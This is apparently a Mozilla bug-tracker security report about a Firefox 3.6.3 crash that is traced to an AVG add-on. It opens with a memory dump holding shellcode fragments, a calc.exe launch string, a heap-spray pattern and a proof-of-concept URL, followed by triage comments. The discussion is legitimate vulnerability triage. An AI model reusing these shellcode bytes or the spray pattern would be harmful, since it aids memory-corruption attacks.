00 00 09 c0 74 12 89 c6 0f b6 07 01 c7 eb cd 31 c0 40 89 44 24 1c 61 c3 31 c0 eb f6 ...@P........t..........1.@.D$.a.1... 20647156 60 8b 44 24 24 03 40 3c 8d 40 18 8d 40 60 8b 38 09 ff 74 52 03 7c 24 24 8b 4f 18 8b 5f 20 03 5c 24 24 fc 49 7c `.D$$.@<.@..@`.8..tR.|$$.O.._ .\$$.I| 2064717b 40 8b 34 8b 03 74 24 24 31 c0 99 ac 08 c0 74 07 c1 c2 07 01 c2 eb f4 3b 54 24 28 75 e1 8b 57 24 03 54 24 24 0f @.4..t$$1.....t........;T$(u..W$.T$$. 206471a0 b7 04 4a c1 e0 02 8b 57 1c 03 54 24 24 8b 04 10 03 44 24 24 89 44 24 1c 61 c2 08 00 31 c0 eb f4 c9 ff df 10 31 ..J....W..T$$....D$$.D$.a...1.......1 206471c5 92 bf e8 00 00 00 00 00 00 00 00 00 90 63 61 6c 63 2e 65 78 65 00 90 00 00 30 00 25 00 45 00 39 00 25 00 38 00 .............calc.exe....0.%.E.9.%.8. 206471ea 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 2.%.9.0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2 2064720f 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 .%.9.0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2. 20647234 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 %.9.0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2.% 20647259 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 .9.0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2.%. 2064727e 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 9.0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2.%.9 206472a3 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 .0.%.E.9.%.8.2.%.9.0.%.E.9.%.8.2.%.9. 206472c8 30 00 25 00 45 00 39 00 25 00 38 00 32 00 25 00 39 00 30 00 25 00 45 00 45 00 25 00 41 00 31 00 25 00 41 00 30 0.%.E.9.%.8.2.%.9.0.%.E.E.%.A.1.%.A.0 206472ed 00 2c 00 20 00 6f 00 72 00 69 00 67 00 69 00 6e 00 3a 00 20 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 63 00 .,. .o.r.i.g.i.n.:. .h.t.t.p.:././.c. 20647312 79 00 62 00 65 00 72 00 6d 00 65 00 64 00 69 00 61 00 70 00 6c 00 61 00 6e 00 65 00 74 00 2e 00 63 00 6f 00 6d y.b.e.r.m.e.d.i.a.p.l.a.n.e.t...c.o.m 20647337 00 2f 00 73 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 2f 00 46 00 46 00 33 00 2e 00 36 00 2e 00 33 00 2f 00 ./.s.e.c.u.r.i.t.y./.F.F.3...6...3./. 2064735c 46 00 46 00 33 00 2e 00 36 00 2e 00 33 00 2d 00 50 00 6f 00 43 00 2d 00 76 00 32 00 2e 00 30 00 2e 00 68 00 74 F.F.3...6...3.-.P.o.C.-.v.2...0...h.t 20647381 00 6d 00 6c 00 2c 00 20 00 63 00 6f 00 6e 00 74 00 65 00 78 00 74 00 3a 00 20 00 3c 00 48 00 54 00 4d 00 4c 00 .m.l.,. .c.o.n.t.e.x.t.:. .<.H.T.M.L. 206473a6 20 00 45 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 3e 00 2c 00 20 00 6d 00 69 00 6d 00 65 00 3a 00 20 00 2c 00 20 .E.l.e.m.e.n.t.>.,. .m.i.m.e.:. .,. 206473cb 00 6e 00 75 00 6c 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .n.u.l.l............................. 206473f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..................................... 20647415 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .....................................
|
||
Comment 1•14 years ago
|
||
|
|
||
Comment 2•14 years ago
|
||
I can confirm the DoS aspect at least, crashes from resource exhaustion on my Mac -- the usual throw from operator new. That's a safe crash and nothing to worry about. Will try on Windows next -- the report of a DEP violation is clearly bad. However, I notice that AVG was on the stack and we've had trouble with their add-ons in the past. See http://www.mozilla.com/en-US/blocklist/ for example. Could you try this again in safe-mode or at least with AVG's add-on disabled? It's possible you're finding an exploitable bug in AVG rather than Firefox.
Attachment #449761 -
Attachment is obsolete: true
|
|
||
Updated•14 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Updated•14 years ago
|
|
Reporter | |
Comment 3•14 years ago
|
||
I tried to run the poc with the AVG add-on turned off and with firefox in safe mode, but was not able to reproduce a DEP violation. I kind of figured it was an issue with AVG because the DEP violation always occurs around the same address in memory eip=20646962, which I think is an AVG dll. At least you guys have more insight then the people at ZDI. The response of, "I think there is an issue" just didn't sound right to me. So, if the AVG Safe Search 9.0.0.825 add-on is installed while running FF 3.6.3 on Vista, I am able to overwrite a memory location which is jmp'ed to by the AVG dll C:\Program Files (x86)\AVG\AVG9\Firefox\components\avgssff.dll. Yeah, I still think this might be an issue. Now, I guess the next step would be to try to notify AVG and verify the issue?
|
|
||
Comment 5•14 years ago
|
||
ZDI may not have tested with AVG installed so you could check that with them, but if they're still not interested talk to AVG.
|
|
||
Updated•14 years ago
|
Whiteboard: [sg:vector-critical? (AVG)] → [sg:vector-critical? (AVG)][sg:dos oom otherwise]
|
|
Reporter | |
Comment 6•14 years ago
|
||
Yeah I get that, it is limited by the fact it would depend on an AVG add-on if the issue were to be exploited. I may bring the issue back to ZDI's attention; however, it is not really an issue with Firefox, but rather a third party application. Thanks for taking the time to look over the issue, either way I learned from my experience.
|
|
||
Updated•12 years ago
|
Keywords: sec-vector
|
||
Comment 7•4 years ago
|
||
POC is gone, not enough info to pursue.
Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•